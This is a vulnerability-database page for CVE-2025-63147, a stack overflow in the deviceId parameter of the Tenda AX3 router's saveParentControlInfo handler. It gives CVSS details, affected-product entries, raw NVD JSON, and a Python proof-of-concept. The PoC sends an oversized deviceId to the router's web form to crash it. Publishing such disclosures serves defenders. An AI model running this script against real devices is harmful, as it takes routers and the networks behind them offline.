Security Vulnerability Report
中文
CVE-2025-63147 CVSS 7.5 HIGH

CVE-2025-63147

Published: 2025-11-10 17:15:35
Last Modified: 2025-11-18 17:16:08

Description

Tenda AX3 V16.03.12.10_CN was discovered to contain a stack overflow in the deviceId parameter of the saveParentControlInfo function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ax3_firmware:16.03.12.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ax3:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda AX3 V16.03.12.10_CN

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-63147 PoC - Tenda AX3 Stack Overflow in saveParentControlInfo # Target: Tenda AX3 V16.03.12.10_CN # Vulnerability: Stack overflow via deviceId parameter in saveParentControlInfo function target_ip = "192.168.0.1" # Default Tenda router IP target_url = f"http://{target_ip}/goform/saveParentControlInfo" # Generate malicious payload with oversized deviceId parameter # The payload triggers stack overflow by sending excessive data def generate_payload(): # Create a long string to overflow the stack buffer overflow_length = 1000 # Adjust based on actual buffer size malicious_device_id = "A" * overflow_length # Construct the exploit payload payload = { "deviceId": malicious_device_id, "deviceName": "test", "mac": "AA:BB:CC:DD:EE:FF", "enable": "1" } return payload def exploit(): print("[*] CVE-2025-63147 PoC - Tenda AX3 Stack Overflow") print(f"[*] Target: {target_url}") payload = generate_payload() try: print("[*] Sending malicious request...") response = requests.post(target_url, data=payload, timeout=5) print(f"[*] Response Status: {response.status_code}") print("[*] Request sent. Check if device is responsive.") except requests.exceptions.RequestException as e: print(f"[+] Exploit sent - Device may be DoS'd: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63147", "sourceIdentifier": "[email protected]", "published": "2025-11-10T17:15:34.637", "lastModified": "2025-11-18T17:16:07.860", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tenda AX3 V16.03.12.10_CN was discovered to contain a stack overflow in the deviceId parameter of the saveParentControlInfo function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request."}, {"lang": "es", "value": "Se descubrió que Tenda AX3 V16.03.12.10_CN contenía un desbordamiento de pila en el parámetro deviceId de la función saveParentControlInfo. Esta vulnerabilidad permite a los atacantes provocar una Denegación de Servicio (DoS) mediante una solicitud manipulada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ax3_firmware:16.03.12.10:*:*:*:*:*:*:*", "matchCriteriaId": "08A2E630-D40C-4ECE-8B4D-BA2482267F3C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ax3:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A01F4C4-FFFF-48DD-90DB-4DD29FE57479"}]}]}], "references": [{"url": "https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/5/1.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}